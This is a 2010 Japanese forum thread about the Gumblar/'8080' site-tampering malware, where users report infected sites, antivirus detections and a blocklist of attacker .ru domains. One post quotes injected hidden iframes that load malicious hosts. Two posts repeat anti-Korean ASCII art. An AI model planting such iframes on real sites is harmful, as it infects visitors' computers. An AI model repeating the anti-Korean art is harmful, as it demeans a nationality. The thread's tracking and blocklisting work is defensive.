     ,,/^ヽ,-''":::i/::::::::/:::::|i/;;;;;;/::::;;;;ノ⌒ヽノ::::::::::::ヽ,_Λ
     ;;;;;;:::::;;;;;;;;;;:::::;;;;;;;;:::/;;;;;;:::::::::;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::::::;;:;;;;:::ヽ
130名無しさん@お腹いっぱい。:2010/01/20(水) 00:38:02
二番煎じイクナイ
131名無しさん@お腹いっぱい。:2010/01/20(水) 01:23:53
ttp://www●s-palcall●com/?download.php?file=602037
何となく鑑定スレ見てたらこんなのが依頼されてた

これからは短縮URLサービス使ったトラップも増えていくだろうし2chもおっかないのう
132名無しさん@お腹いっぱい。:2010/01/20(水) 01:28:52
>>128
なんか違うような気がする
133名無しさん@お腹いっぱい。:2010/01/20(水) 01:40:06
.__    
|\_\    
|  |.◎.|
|  |.: |
.\|.≡.|
   ̄ ̄
  _,,_ ∩
 (^Д^)/
 ⊂  ノ とったどー
  (つ ノ
  (ノ
134名無しさん@お腹いっぱい。:2010/01/20(水) 02:51:45

  i |i li| il| 
. | 百  |; ガッ 
;.:|___d._|;'    
☆(;。∀゚)←>>*** 
  /⊃ ⊃ 
135名無しさん@お腹いっぱい。:2010/01/20(水) 03:59:30
最近、本当に洒落になってないな・・・
普通にweb巡回するだけでノートンの糞アドオンが真っ赤になる始末
今までだと掲示板系サイトの誤爆で済んでたがソース元を見るとjs絡みのtrojanと明らかにアレ臭い
動画サイトは思いっきりJS開いてるんだがflashの方のadobe側の対応は間に合っているのかな・・・
136名無しさん@お腹いっぱい。:2010/01/20(水) 04:26:08
落ち着くまで専ブラで2ch見るだけにしといた方がいいな
・・・と思ったのが去年の四月でした
137名無しさん@お腹いっぱい。:2010/01/20(水) 04:41:37
専ブラは専ブラで直リン馬鹿のせいで反応しまくってうざいし困ったもんだ
138名無しさん@お腹いっぱい。:2010/01/20(水) 04:51:28
>>135
却ってエロサイトの方が管理をしっかりやってるのが多い気がする。
139名無しさん@お腹いっぱい。:2010/01/20(水) 04:52:42
Avast!5.0発表
140名無しさん@お腹いっぱい。:2010/01/20(水) 04:54:03
同人サイトの感染率の高さは異常
他板に専用対策スレがあるのも納得
141名無しさん@お腹いっぱい。:2010/01/20(水) 06:03:07
142名無しさん@お腹いっぱい。:2010/01/20(水) 08:20:23
>>127
MicrosoftがIEの臨時パッチを公開へ、脆弱性問題に対応
ttp://www.itmedia.co.jp/news/articles/1001/20/news021.html
> DEFがデフォルトで有効になっているIE 8へのアップグレードを勧告している。
> しかし仏セキュリティ企業のVUPENが、DEPをかわす方法が見つかったと発表するなど状況は変わりつつある。
143名無しさん@お腹いっぱい。:2010/01/20(水) 08:22:04
>>142のPoCマダー!?
144名無しさん@お腹いっぱい。:2010/01/20(水) 08:52:23
今しがたNHKでガンブラー特集やってたけど
対策はウィルスソフト更新しろとしか言わないのな
JAVA、PDF云々は言わないってのはやっぱなんか裏にあるのかな?
145名無しさん@お腹いっぱい。:2010/01/20(水) 08:54:28
キーロガーの実験失敗しててわろた。
146名無しさん@お腹いっぱい。:2010/01/20(水) 08:56:36
                             |
                             |
       {    !      _,, -ェェュ、   |
ィ彡三ミヽ  `ヽ     ,ィハミミミミミミミミミヽ、|
彡'⌒ヾミヽ   `ー  /ililハilミilミliliミliliミliliミ|
     ヾ、        /iiiiイ!ヾヾミ、ミニ=ー-ミ|
  _    `ー―' i!ハ:.:.\\_::::::::::::::/:.| NHKは
彡三ミミヽ        i! ヽ:.:.:.:冫': : :::/,,∠|
彡'   ヾ、    _ノ i!::: ̄二ー:: : ::::ソ ・ ,| 太陽と煉瓦に
      `ー '    {ヘラ' ・_>シ;テツ"''''"|
 ,ィ彡三ニミヽ  __ノ ヽヘ`" 彡' 〈     | 監視されて
彡'      ` ̄       `\   ー-=ェっ |
      _  __ ノ  {ミ;ヽ、   ⌒   | います
   ,ィ彡'   ̄        ヾミミミミト-- '  |
ミ三彡'        /⌒ / ̄ ̄ | : ::::::::::|
       ィニニ=- '     / i   `ー-(二つ
     ,ィ彡'         { ミi      (二⊃
   //        /  l ミii       ト、二)
 彡'       __,ノ   | ミソ     :..`ト-'
        /          | ミ{     :.:.:..:|
            ノ / ヾ\i、   :.:.:.:.:|
      ィニ=-- '"  /  ヾヾiiヽ、 :.:.:.:.::::|
    /     /  `/ ̄ ̄7ハヾヾ : .:.:.|
   ノ     _/   /   /  |:. :.:.:.:.:.:.:|
147名無しさん@お腹いっぱい。:2010/01/20(水) 08:56:40
>>144
素人に細かい設定なんか無理だろって思ってんじゃね?
NHKならPCの苦手な年寄りも多く見てるだろうし
148名無しさん@お腹いっぱい。:2010/01/20(水) 08:58:49
しかしあれだな、設定いじってJAVA切りやなんやしてても前ほど気軽にサイト巡り
しなくなってしまった
149名無しさん@お腹いっぱい。:2010/01/20(水) 09:02:50
昨日見かけたURL、マイクロさんがはじめてブロックしました。
ここどーですか?


22 名前: バールのようなもの(不明なsoftbank)[] 投稿日:2010/01/19(火) 18:44:39.14 ID:64+L9xsa
【サンプル動画】

97 名前:名無し募集中。。。[] 投稿日:2010/01/19(火) 16:02:03.04 0
h t t p : / / www.prestige-av.com/ec/index.php?main_page=show_movie&product_model=EVO-118
150名無しさん@お腹いっぱい。:2010/01/20(水) 09:13:55
最近のClamAVのMLを見る限りGumblarの亜種大杉
PDFだけでも20〜30、さらにあったか・・・
151名無しさん@お腹いっぱい。:2010/01/20(水) 09:16:55
>>128みたいなことをすると>>134のようになるので非推奨。
152名無しさん@お腹いっぱい。:2010/01/20(水) 09:47:30
>>48
ちょw
153名無しさん@お腹いっぱい。:2010/01/20(水) 09:50:18
>>141
Pandaクラウドになったら検知率上がったみたい
154名無しさん@お腹いっぱい。:2010/01/20(水) 10:11:27
SSLなFTPを使ってる場合でもFTPのIDとパス抜かれることもあるんでしょうか?
155名無しさん@お腹いっぱい。:2010/01/20(水) 12:07:42
JPCERTから確認メールが来たので。
報告した中からgoogleでURLを検索して検索数が多かった被害サイト

smartlifestyle.sakura.ne●jp/ 58500
www.iyashisalon-navi●net/ 34200 サイト全体

nakano.main●jp/ 16000
cash-you●com/ 11100

www.f-ture●com/ 9890
monde.client●jp/ 7050 monde.client●jp/monde/02.html とか数ページ
eefy.fem●jp/ 6040
156名無しさん@お腹いっぱい。:2010/01/20(水) 13:58:14
CODE1の新型?にくっついてたけど・・
---↓ここから↓---
<iframe umcoq='HwL7BETd' src='http://liveiframe●net/s/in●cgi?7 '
tligu='CJyMDWo4' width='0' height='0' style='display:none'></iframe>
<iframe iccmc='nU2hKVfk' src='http://4analytics●ws/in●cgi?8 '
wcxjb='QMXsIujE' width='0' height='0' style='display:none'></iframe>
---↑ここまで↑---

今度は「あふぃ」でも始めたのか?
157名無しさん@お腹いっぱい。:2010/01/20(水) 14:30:51
mbspro2●uic●to/user/melraia●html
ここやられてる?
158名無しさん@お腹いっぱい。:2010/01/20(水) 14:47:37
ここで報告されてるウイルスってPCサイトビューアーでも感染するのか?
159名無しさん@お腹いっぱい。:2010/01/20(水) 14:48:53
windowsかんけーないから大丈夫
160名無しさん@お腹いっぱい。:2010/01/20(水) 14:50:50
>>159って>>158へ?
そうですか…最近携帯にも感染するウイルスってのもいるみたいだから…
161名無しさん@お腹いっぱい。:2010/01/20(水) 15:00:52
それとこれとは関係ないと思う
162名無しさん@お腹いっぱい。:2010/01/20(水) 15:17:07
>>156
PDF大好きなin.cgiやin.phpはかなり前から見かける。
微妙に別系統(完全に別とは思わんけど)な気がする。
163名無しさん@お腹いっぱい。:2010/01/20(水) 16:22:24
>>7 のポート135閉じようと思ったんだけど、
実行ファイルのパスに
C:\WINDOWS\system32\svchost -k rpcss

とあって、スタートアップの種類が自動から変えられない・・。
これは何なんでしょうか?
164名無しさん@お腹いっぱい。:2010/01/20(水) 16:33:16
>>163
カスペルスキー使ってない?
だとしたら犯人はカスペルスキーだ。
165名無しさん@お腹いっぱい。:2010/01/20(水) 16:34:47 BE:1056145267-PLT(12031)
>>163
>>7はルータ(ブロードバンドルータ含む)があれば普通はアクセスできないから設定不要だよ
166名無しさん@お腹いっぱい。:2010/01/20(水) 16:36:57
【速報】JEITA(電子情報技術産業協会)のサイトが一時停止 〜 Gumblar被害か?
167名無しさん@お腹いっぱい。:2010/01/20(水) 16:39:21
>>166
ぐぐるキャッシュに/*LGPL*/
168名無しさん@お腹いっぱい。:2010/01/20(水) 16:39:28
ガムビルアー
169名無しさん@お腹いっぱい。:2010/01/20(水) 16:47:29
>>164
カスペルスキーは使ってないです。ソフトはESET Smart

>>165
なるほどw 了解です

設定変えられないから、ウィルスにでも感染してるのかと心配になったよ。
回答サンクス
170名無しさん@お腹いっぱい。:2010/01/20(水) 16:57:21
何やってんだ > 鯖缶
171名無しさん@お腹いっぱい。:2010/01/20(水) 17:01:58
鯖缶をボッコボコにしてぐつぐつ煮込んで鯖缶缶を作りたい
172名無しさん@お腹いっぱい。:2010/01/20(水) 17:11:05
鯖缶は製造後半年ぐらいからが食べ頃
美味いのは一年目ぐらいだな
173名無しさん@お腹いっぱい。:2010/01/20(水) 17:16:10
つーかGENOが対策を怠ったからこうなったんだろ
あいつらは責任とって自決するべきだ
あそこまでして業務停止命令が下らないなんて世の中おかしいよ
174名無しさん@お腹いっぱい。:2010/01/20(水) 17:36:36
またGENOとかアホか
175名無しさん@お腹いっぱい。:2010/01/20(水) 17:41:04
癌ブラーはどこまで転移してますか?
176名無しさん@お腹いっぱい。:2010/01/20(水) 18:30:24 BE:452633292-PLT(12031)
ドメインに使われている名称'geno'は現状に適しないと考え、新ドメインに移転することになりました。
ブックマーク等の変更をお願い致します。
http://gumblarchecker.crz.jp/
GumblarChecker2=http://gumblarchecker.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
177名無しさん@お腹いっぱい。:2010/01/20(水) 18:35:36
>>117
多分他にも。

というかMTのテンプレファイルもやられるっぽい。
MTで作ったサイトが全ページあうあうだった。


しかし、小さな会社だと「改ざんされてたアルよ・・・」って告知するとダメージ大きいよなぁ。
そんな理由で告知しないところが多数なんだけど、やっぱ告知すべきなのかね?
178名無しさん@お腹いっぱい。:2010/01/20(水) 18:37:00
>>176
あー、お疲れ様です。


あ、書き忘れてたけど、avastがようやく8080スクリプトを検出してくれるようになった。
他のソフトどうよ?
179名無しさん@お腹いっぱい。:2010/01/20(水) 18:40:59
Aviraは本体only
180名無しさん@お腹いっぱい。:2010/01/20(水) 18:41:38
>>166
広報に凸してみました
笑ってました(何故?

ttp://www.jeita.or.jp/japanese/about/secret/new_location.htm
新JEITA本部事務所〒101-0065
東京都千代田区西神田3-2-1 
千代田ファーストビル南館
総合企画部(企画グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(政策グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(調査グループ) TEL:03-5275-7255 / FAX:03-5212-8121
総合企画部(広報室) TEL:03-5275-7254 / FAX:03-5212-8123
総合企画部(安全担当) TEL:03-5275-7256 / FAX:03-5212-8121
知的基盤部 TEL:03-5275-7259 / FAX:03-5212-8122
知的基盤部(補償金管理室) TEL:03-5212-8131 / FAX:03-5212-8132
国際部 TEL:03-5275-7263 / FAX:03-5212-8122
環境部 TEL:03-5275-7257 / FAX:03-5212-8121
コンシューマ・プロダクツ部 TEL:03-5275-7260 / FAX:03-5212-8122
コンシューマ・プロダクツ部
(特定プロジェクト推進室) TEL:03-5275-7260 / FAX:03-5212-8122
インダストリ・システム部 TEL:03-5275-7261 / FAX:03-5212-8122
電子部品部
TEL:03-5275-7262 / FAX:03-5212-8122
電子デバイス部 TEL:03-5275-7258 / FAX:03-5212-8121
総務部(総務グループ) TEL:03-5275-7251 / FAX:03-5212-8121
総務部(経理グループ) TEL:03-5275-7252 / FAX:03-5212-8121
総務部(会員サービスグーループ) TEL:03-5212-8255 / FAX:03-5212-8130
関連組織[移転事務所のみ]
有限責任中間法人 ITセキュリティセンター
Information Technology Security Center
〒101-0065 東京都千代田区西神田3-2-1 千代田ファーストビル南館
TEL:03-5212-8271 / FAX:03-5212-8272
181名無しさん@お腹いっぱい。:2010/01/20(水) 18:48:44
>>177
無能管理者のせいで客のPCを被害にあわせてるのに告知しないほうがおかしい
まあ客も馬鹿だけど隠蔽するのは悪質すぎる
182名無しさん@お腹いっぱい。:2010/01/20(水) 18:51:38
ヒューリスティックエンジンを搭載した「avast! Free Antivirus」v5.0が公開
http://tsushima.2ch.net/test/read.cgi/news/1263980293/
183名無しさん@お腹いっぱい。:2010/01/20(水) 18:53:27
Gumblar: べつになんでもないこと
ttp://puppet.asablo.jp/blog/cat/gumblar/

ガンブラー vs avast! - smilebanana
ttp://www.smilebanana.com/archives/2010/01/19-2021.php

この辺のブログも要チェック。
184名無しさん@お腹いっぱい。:2010/01/20(水) 20:41:54
http://www.atmarkit.co.jp/fsecurity/column/kawaguchi/022.html

もうGumblarへの対応に疲れちゃったんですが……

お疲れ様です。一緒に飲みに行きましょう:-)。


www
185名無しさん@お腹いっぱい。:2010/01/20(水) 20:46:15
>>177
MTの場合はバージョンが古く、ソフトの脆弱性を突かれて
管理PCは感染していなくても勝手に管理権限のあるIDが増やされたりした事例もあったはず。

サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2112
186名無しさん@お腹いっぱい。:2010/01/20(水) 20:48:50
>>176
乙。
デザインが一新されて良い感じ。
右上のガンブラーAAワロスw
187名無しさん@お腹いっぱい。:2010/01/20(水) 21:14:35
>>184
>●ガンブラーとカタカタ表記になるのがイヤなんですが……

カタカタカタカタカタカタカタカタ((((;゚Д゚)))カタカタカタカタカタカタカタカタ
188名無しさん@お腹いっぱい。:2010/01/20(水) 21:18:20
ワロチ
189名無しさん@お腹いっぱい。:2010/01/20(水) 21:34:03
普段ウィルスやセキュリティに無頓着な起業がこういう時にわかるからなー
190名無しさん@お腹いっぱい。:2010/01/20(水) 21:57:15
いままでウィルスにかかっても個人なら個人の問題ですんだが、
これは個人の問題じゃないからな
191名無しさん@お腹いっぱい。:2010/01/20(水) 22:21:43
脳豚2010使ってるんだけど
ヤホーとかで検索して
検索結果の右端のマークが緑だったら大丈夫なの?
そうならGumblarとか8080にやられていないってことでFA?
192名無しさん@お腹いっぱい。:2010/01/20(水) 22:23:38
>>191
指標にはなるが確実とはいえない
193名無しさん@お腹いっぱい。:2010/01/20(水) 22:24:09
>>191
全然当てにならないと思え
194名無しさん@お腹いっぱい。:2010/01/20(水) 22:27:24
>>192-193
わかったありがとう
195名無しさん@お腹いっぱい。:2010/01/20(水) 22:30:31
俺はjavascriptを使ってるサイトは入らないようにしてる
だから今後はjavascriptを使わないサイトが増えるだろう

そもそもjavascriptって耳とかヘソにピアスするような感じだろ
消毒しなかったら膿んでくるしね。 あとあと面倒
いらねーよ(´A`)

196名無しさん@お腹いっぱい。:2010/01/20(水) 22:32:23
俺は去年から基本的にJavaはどちらも切ってるな
197名無しさん@お腹いっぱい。:2010/01/20(水) 22:34:28
IE6ではやほー検索するとVB先生のチェックが入って、
サイト名の左に緑(安全)赤(危険)グレー(未チェック)のマークがあったのに、
こないだIE6からIE8にしたら、何も出なくなっちゃって、
サイト行くのが不安だ…。
けっこうあのマーク頼りにしてたのに、IE8はマークなしデフォなの?
教えてえろいひと
198名無しさん@お腹いっぱい。:2010/01/20(水) 22:36:42
聞く相手や場所が違うことに気が付きませんか?
199名無しさん@お腹いっぱい。:2010/01/20(水) 22:39:16
そうでした、ここガンブラスレだった。
みなさん失礼しました
200名無しさん@お腹いっぱい。:2010/01/20(水) 22:50:42
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った
もう2chで貼られている画像リンクに興味を抱く事もないだろう
201名無しさん@お腹いっぱい。:2010/01/20(水) 22:51:31
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った
もう2chで貼られている画像リンクに興味を抱く事もないだろう
202名無しさん@お腹いっぱい。:2010/01/20(水) 22:53:40
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った
もう2chで貼られている画像リンクに興味を抱く事もないだろう
203名無しさん@お腹いっぱい。:2010/01/20(水) 22:53:57
大事な事なので2回(ry
じゃなくて、P2鯖の暴発ねw
204名無しさん@お腹いっぱい。:2010/01/20(水) 23:01:07
3回言ってますぜ旦那
205名無しさん@お腹いっぱい。:2010/01/20(水) 23:02:48
WBSで特集か、笑わせてもらうかな。
206名無しさん@お腹いっぱい。:2010/01/20(水) 23:07:25
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |         
       ____.____    | .__     いらない韓国を
     |        |        |   | |\_\     窓から投げ捨てろ
     |        | ∧_∧ |   | |  |.◎.|
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄
207名無しさん@お腹いっぱい。:2010/01/20(水) 23:08:31
はじまた
208名無しさん@お腹いっぱい。:2010/01/20(水) 23:13:41
オワタ
209名無しさん@お腹いっぱい。:2010/01/20(水) 23:14:52
釣りかよ
210名無しさん@お腹いっぱい。:2010/01/20(水) 23:16:44
・・・お前らおやすみ。
211名無しさん@お腹いっぱい。:2010/01/20(水) 23:29:38
PCデポの無料診断はバスターのオンラインスキャン
ttp://www.trendflexsecurity.jp/housecall/index.php?Homeclick=threat_onlinescan
パッケージ販売やメーカー修理を目論んでいるらしい
212名無しさん@お腹いっぱい。:2010/01/20(水) 23:43:55
ウイルスバスターのファイルスキャンはゴミなのに・・・
213名無しさん@お腹いっぱい。:2010/01/21(木) 00:31:40
STOP刈って上がりやがった
214213:2010/01/21(木) 00:32:22
誤爆です
ごめんなさい
215名無しさん@お腹いっぱい。:2010/01/21(木) 01:46:18
>>184
>>166
のリンク先って何があったの?なぜ騒がれているの?
216名無しさん@お腹いっぱい。:2010/01/21(木) 01:50:37
天下り 先の大人の事情
217名無しさん@お腹いっぱい。:2010/01/21(木) 10:57:22
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |         
       ____.____    | .__     いらない韓国を
     |        |        |   | |\_\     窓から投げ捨てろ
     |        | ∧_∧ |   | |  |.韓.|
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.国.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄
218名無しさん@お腹いっぱい。:2010/01/21(木) 13:00:24
感染した場合、リカバリインストールで対処してもも問題ないのかこれ?
219名無しさん@お腹いっぱい。:2010/01/21(木) 15:12:31
2chの専ブラはIE使ってないやつ使うだろ普通
Doe最高
220名無しさん@お腹いっぱい。:2010/01/21(木) 16:52:21
>>117
main.html
main.php
default-filters.php
221名無しさん@お腹いっぱい。:2010/01/21(木) 17:27:06
>>219
有名どころではギコナビやlive2chはIE仕様
特にlive2chには根強いファンが結構いる
ギコナビはとにかくシンプル且つ初心者向け設計、live2chはjaneには拡張面で負けるが使い易さを追求したタイプ
222名無しさん@お腹いっぱい。:2010/01/21(木) 19:12:38
パルコールは今だ告知無し
223名無しさん@お腹いっぱい。:2010/01/21(木) 19:42:47
電凸のときに嘘でも「ご連絡恐れ入ります」くらい言えない企業なんてそんなもんだろ
224名無しさん@お腹いっぱい。:2010/01/21(木) 20:14:20
東京芸術劇場のサイトが感染したのはどのタイプ?
225名無しさん@お腹いっぱい。:2010/01/21(木) 20:16:01
>>224
感染したのか?
226名無しさん@お腹いっぱい。:2010/01/21(木) 20:44:03
227名無しさん@お腹いっぱい。:2010/01/21(木) 20:54:43
>>226
公表せずに逃げきろうとしたのか
糞だな
228名無しさん@お腹いっぱい。:2010/01/21(木) 20:57:37
感染の恐れがあるっていうか、相当な数の人間が感染してるだろw
229名無しさん@お腹いっぱい。:2010/01/21(木) 20:59:50
updateしてたら大丈夫でそ
230名無しさん@お腹いっぱい。:2010/01/21(木) 21:01:30
これサイトの管理者が感染してるんだから
なんとか大元特定できないのかね?
231名無しさん@お腹いっぱい。:2010/01/21(木) 21:04:50
なんというか管理者にも閲覧者にも馬鹿が多いなあ
考え方が甘いって言うか
232名無しさん@お腹いっぱい。:2010/01/21(木) 21:11:00
そのうち感染してないやつのほうが少なくなるんじゃないか
233名無しさん@お腹いっぱい。:2010/01/21(木) 21:15:31
そこも日本芸術文化振興会という独立行政法人へ天下りした官僚の受け皿。
234名無しさん@お腹いっぱい。:2010/01/21(木) 21:15:55
さすがよく腐熟してらっしゃる
235名無しさん@お腹いっぱい。:2010/01/21(木) 21:56:36
http://www.g-factory●org/
バスターでJS_ONLOAD.SMFがでて、avastでJS:Illredir-Cが出た
236名無しさん@お腹いっぱい。:2010/01/21(木) 22:18:27
それ何のサイトだっけな
ゲーム?
やっべ俺逝ったことある?
237名無しさん@お腹いっぱい。:2010/01/21(木) 22:20:57
>>235
McAfee
JS/Redirector.e
238名無しさん@お腹いっぱい。:2010/01/21(木) 22:57:13
>>235
/*LGPL*/さんが居座ってるな
239名無しさん@お腹いっぱい。:2010/01/21(木) 23:12:18
microsoft data access components アドオンを実行しようとしています。
240名無しさん@お腹いっぱい。:2010/01/21(木) 23:24:59
httpコロンスラスラkitten●k-click●net/
241名無しさん@お腹いっぱい。:2010/01/21(木) 23:29:04
>> 230

> なんとか大元特定できないのかね?

ホリプロじゃね?

Domain Information: [ドメイン情報]
[Domain Name] TGG-TS.JP
[登録者名] 株式会社 ホリプロ
[Registrant] horipro
[Name Server] ns1.secure.net
[Name Server] ns2.secure.net
[登録年月日] 2009/02/05
[有効期限] 2010/02/28
[状態] Active
[最終更新] 2010/01/04 14:19:31 (JST)

242名無しさん@お腹いっぱい。:2010/01/21(木) 23:32:32
記事にホリプロってあるしな
243名無しさん@お腹いっぱい。:2010/01/21(木) 23:34:53
>>235
めるすたお。
244名無しさん@お腹いっぱい。:2010/01/21(木) 23:35:02
新型か?難読化されてないww
/*handle exception*/

hxxp://tkfd-shumatsu-gakko●jp/cat15/

avast!, Avira 送付済み
245名無しさん@お腹いっぱい。:2010/01/21(木) 23:38:44
>>240
k-click●net
だにゃ
246名無しさん@お腹いっぱい。:2010/01/21(木) 23:40:07
>>244
アッー!
247名無しさん@お腹いっぱい。:2010/01/21(木) 23:41:35
>>244
これってアンチウイルスは対応できないのとちゃう?
248名無しさん@お腹いっぱい。:2010/01/21(木) 23:46:15
>>244
当然、チェッカーにひっかからない
対応出来ないだろこれ
.ru:8080のアドレス集めるしかないのか
249名無しさん@お腹いっぱい。:2010/01/21(木) 23:49:06
って>>245のなかに>>244になったのもある。。。
250名無しさん@お腹いっぱい。:2010/01/21(木) 23:50:33
こわいっ
こわいいい!
251名無しさん@お腹いっぱい。:2010/01/21(木) 23:52:05
>>247
なんで?
素人でごめんなさい。
252名無しさん@お腹いっぱい。:2010/01/21(木) 23:54:54
>>251
普通のスクリプトになったから。。。
アドレスで反応するようになるかも。。。
253名無しさん@お腹いっぱい。:2010/01/21(木) 23:55:07
>>23
のgenius.jpn●org/も別のスクリプトになってないか?
254名無しさん@お腹いっぱい。:2010/01/21(木) 23:57:14
>>244
Aguseでカスペ反応でた
Trojan.JS.Iframe.hw
255名無しさん@お腹いっぱい。:2010/01/21(木) 23:58:53
>>252
ありがと。
256名無しさん@お腹いっぱい。:2010/01/22(金) 00:09:21
>>253 thx
avast!, Avira に提出した
257名無しさん@お腹いっぱい。:2010/01/22(金) 00:20:53
>>245
whoisからのとでじろくにめる
258名無しさん@お腹いっぱい。:2010/01/22(金) 00:24:49
>>244
カスペだと↓こんなん出ました

2010/01/22 0:16:23 検出しました: Trojan.JS.Iframe.hw  http://blogger-com●fandango●com●charter-net●authentictype●ru:8080/live●com/live●com/sina●com●cn/nhl●com/google●com/
259名無しさん@お腹いっぱい。:2010/01/22(金) 00:25:20
俺たちもいつまで無事でいられるのだろうか。
260名無しさん@お腹いっぱい。:2010/01/22(金) 00:25:58
>>244
avast!反応した
261名無しさん@お腹いっぱい。:2010/01/22(金) 00:26:48
>>258
これって飛ばされた先に反応してるんであってスクリプトには反応してないってことだよな
262名無しさん@お腹いっぱい。:2010/01/22(金) 00:29:50
>>261

You are right !

だから、JSを切った状態では反応しなかったよwww
263名無しさん@お腹いっぱい。:2010/01/22(金) 00:33:01
264名無しさん@お腹いっぱい。:2010/01/22(金) 00:37:04
aguseのカスペのバージョンはvirustotalより新しいってことかい
265名無しさん@お腹いっぱい。:2010/01/22(金) 00:41:36
>> 244

埋め込まれたページ全滅
ttp://www.virustotal.com/jp/analisis/0d694d4ae4bdcb4a834f848fa0e88715c3a97f833dcf38027e8d6357de5bddd8-1264087766

次の blogger-com●fandango●com●charter-net●authentictype●ru:8080/live●com/live●com/sina●com●cn/nhl●com/google●com/ は、
わりと検出しる
ttp://www.virustotal.com/jp/analisis/e92725bb2d627430609ce25ac2529a53ace77d7cea4d730e5cf75731e764019c-1264087456

その次の本編はカスペだけ
ttp://www.virustotal.com/jp/analisis/f56402351b202aeaae06bc141231fb1cfbcb4062ae10beece0a8a93b3fb073e9-1264087622

本編のPDFをとりに行ったら、とりそこなってアク禁状態...orz
266名無しさん@お腹いっぱい。:2010/01/22(金) 00:41:36
>>264
aguseは飛び先も見てるかも
267名無しさん@お腹いっぱい。:2010/01/22(金) 00:44:19
>>265
こちらの環境では取れないけど
:8080/pics/win.jpg は取れない?
268名無しさん@お腹いっぱい。:2010/01/22(金) 00:52:57
>>267
DNSが引けなくなっちゃった


269名無しさん@お腹いっぱい。:2010/01/22(金) 00:56:21
>>268
ドクペwebのリンクスキャナーも2回に1回しか捕まえられない><
270名無しさん@お腹いっぱい。:2010/01/22(金) 00:58:15
271名無しさん@お腹いっぱい。:2010/01/22(金) 01:02:41
*.ru:8080のドメインを片っ端から試してるけど、全然引けない
全滅っぽいんだけど、うちだけ?

272名無しさん@お腹いっぱい。:2010/01/22(金) 01:04:51
>>271
DNS は引けるけど 8080 に connect できない
273名無しさん@お腹いっぱい。:2010/01/22(金) 01:05:46
>>265>>269-270
authentictype.ru:8080は同じだけど、アドレス違うからか。。。
274名無しさん@お腹いっぱい。:2010/01/22(金) 01:15:11
217.23.5.27
authentictype.ru
オランダ
275名無しさん@お腹いっぱい。:2010/01/22(金) 01:17:20
8080 Gumblar
どっちもサイト改ざんされるの?

あと、最近ニュースで Gumblar と言われてるのは
このスレでいう
8080(GPL GNU CODE1) のこと?
276名無しさん@お腹いっぱい。:2010/01/22(金) 01:23:17 BE:1207023168-PLT(12031)
>>244
対応しました
こう・・特徴が無くなると判断しづらくなるんだよなあ
JavaScriptパーサ作る必要もありそうだ
http://gumblarchecker.crz.jp
277名無しさん@お腹いっぱい。:2010/01/22(金) 01:23:50
>>244
とりあえずめるした。
ろりぽにもつーほー
278名無しさん@お腹いっぱい。:2010/01/22(金) 01:23:55
>>276
279名無しさん@お腹いっぱい。:2010/01/22(金) 01:26:01
>>277 thx
280名無しさん@お腹いっぱい。:2010/01/22(金) 01:26:02
www●lets-juken●com
でウイルスバスターが反応した。
281名無しさん@お腹いっぱい。:2010/01/22(金) 01:26:50
奇跡ktkr
282名無しさん@お腹いっぱい。:2010/01/22(金) 01:27:26
>>280
泣いた
283名無しさん@お腹いっぱい。:2010/01/22(金) 01:28:27
>>244>>258
カスペ対応しました

2010/01/22 1:22:41 検出しました: Trojan.JS.Agent.bbu  http://tkfd-shumatsu-gakko.jp/cat15/
284名無しさん@お腹いっぱい。:2010/01/22(金) 01:29:08
>>280
nikkansports●comとか含まれてるし
ターゲットは日本か
285名無しさん@お腹いっぱい。:2010/01/22(金) 01:29:12
ブラックリスト
補足よろろ

ampsguide.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
suesite.ru
superaguide.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
286名無しさん@お腹いっぱい。:2010/01/22(金) 01:32:04
>>280のsuperpropicks.ruを追加
287280:2010/01/22(金) 01:36:42
会社のPCにバスターCorpで引っかかったので、インストール中のPCでアクセスしてみた。
WinXPSP3+Winupdate済 IE6
AdobeReader7.10
flashはWindowsのもの
gwなし
プロキシ有

プロキシのログにはなにものこってなかった。
バスターCorpでスキャンしても何も出なかった。
288名無しさん@お腹いっぱい。:2010/01/22(金) 01:43:46
>>286
こちらの環境だと落ちてこない。。。
289280:2010/01/22(金) 01:44:59
時間がなかったので、一回試しただけ。
何か、ドジったかな。

とりあえず、試したPCは再インストール中でタイムアップとなった。
290名無しさん@お腹いっぱい。:2010/01/22(金) 01:59:33
Mozilla、Firefox 3.6 正式版を発表!!

新型ウイルス「ガンブラー」対策に有効なプラグインチェックツールを提供、

Firefox 3.6 の入手方法

Windows、Mac、および Linux 版が 70 か国語以上で同時リリースされる Firefox は、他のどのブラウザよりも多くのプラットフォームと言語に対応しています。
Firefox 3.6 は GetFirefox.com から無料でダウンロードできます。なお、Firefox 3.6 は 1 月 22 日 午前 2 時頃よりダウンロード可能となります。

http://mozilla.jp/press/releases/2010/01/21/
291名無しさん@お腹いっぱい。:2010/01/22(金) 02:03:16
>>290
中身はRC2版と同じなんだってね
292名無しさん@お腹いっぱい。:2010/01/22(金) 02:08:39
>>285
追加しますた

